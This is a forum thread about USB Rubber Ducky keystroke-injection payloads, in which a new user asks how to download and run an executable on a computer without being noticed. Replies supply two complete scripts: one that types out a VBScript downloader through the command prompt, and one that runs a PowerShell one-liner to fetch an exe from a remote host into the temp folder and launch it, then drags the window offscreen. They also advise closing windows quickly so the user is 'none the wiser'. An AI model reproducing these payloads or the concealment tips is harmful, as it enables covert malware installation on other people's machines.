Jump to content

[Question][Payload] Help with http download and execute.


crashie
 Share

Recommended Posts

Hi, I'm new to the ducky, just got it today :P

I am trying to get it to download an executable file from a http and then execute it. Have seen the payload called "Ducky Downloader" and it works, but not in the background, instead the CMD pops up and is visible during the whole time until it's finished doing what it should do, download and execute.

Isn't there a way to do this in the background so that it doesn't get noticed?

Thanks in advance!
/ Crashie

Btw, this is the script I'm talking about:

ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
ENTER
DELAY 400
STRING copy con download.vbs
ENTER
STRING Set args = WScript.Arguments:a = split(args(0), "/")(UBound(split(args(0),"/")))
ENTER
STRING Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP"):objXMLHTTP.open "GET", args(0), false:objXMLHTTP.send()
ENTER
STRING If objXMLHTTP.Status = 200 Then
ENTER
STRING Set objADOStream = CreateObject("ADODB.Stream"):objADOStream.Open
ENTER
STRING objADOStream.Type = 1:objADOStream.Write objXMLHTTP.ResponseBody:objADOStream.Position = 0
ENTER
STRING Set objFSO = Createobject("Scripting.FileSystemObject"):If objFSO.Fileexists(a) Then objFSO.DeleteFile a
ENTER
STRING objADOStream.SaveToFile a:objADOStream.Close:Set objADOStream = Nothing
ENTER
STRING End if:Set objXMLHTTP = Nothing:Set objFSO = Nothing
ENTER
CTRL z
ENTER
STRING cscript download.vbs <INSERT URL HERE>
ENTER
STRING <INSERT EXE FILENAME HERE>
ENTER
STRING exit
ENTER
Edited by midnitesnake
formatting
Link to comment
Share on other sites

The problem is, the ducky relies on HID injection (keyboard injection), so it needs the focus of current windows to operate correctly (just like macros), as soon as your window-focus changes, the payload will cease to function correctly, as the payload will be split between 2+ windows.

The advantage is the Ducky types really fast, so just alt-f4 to close the window once the payload is complete, and hopefully no-one will be the wiser (or their distracted or AFK) and completely miss the command prompt.

Alternatively - use the twin-duck firmware to execute directly from the sdcard! Save's from downloading (time/bandwidth), or even a valid http connection ;)

Edited by midnitesnake
Link to comment
Share on other sites

Hi and thanks for your response!

So, whatever I do with the rubber ducky it will always be shown on the actual computer? And there is no way to hide the windows?

I tried the RunEXE script (and have installed twin duck firmware (the special version 1 that runs the payload when CAPS is pressed) but when I did that it just opened up hell of a lot of windows and the registry and some programs and did not execute my file.. So I don't know what went wrong there..

Appreciate any help given. And sorry for being such a newbie :P But one have to start somewhere ;)

/crashie

The problem is, the ducky relies on HID injection (keyboard injection), so it needs the focus of current windows to operate correctly (just like macros), as soon as your window-focus changes, the payload will cease to function correctly, as the payload will be split between 2+ windows.

The advantage is the Ducky types really fast, so just alt-f4 to close the window once the payload is complete, and hopefully no-one will be the wiser (or their distracted or AFK) and completely miss the command prompt.

Alternatively - use the twin-duck firmware to execute directly from the sdcard! Save's from downloading (time/bandwidth), or even a valid http connection ;)

Link to comment
Share on other sites

i posted a large payload somewhere with different possibilities on how to hide it.. were only one worked for me xD i don't remember it though.. but i guess i did it by entering the move command promt option and then just very fast insert some down keys to hide it beneath your screen while it does the rest.

Link to comment
Share on other sites

There are ways to hide the command prompt below the bottom or side of the screen. With the new duckscript compiler, the "REPEAT" command is now included, and here's a link to the hide CMD window payload:

https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---hide-cmd-window

More recently I combined window hiding action with someones powershell wget and execute:

REM Target: WINDOWS VISTA/7
REM Encoder V2.4
REM Using the run command for a broader OS base. 
DELAY 3000
GUI R
DELAY 1000
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe"
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...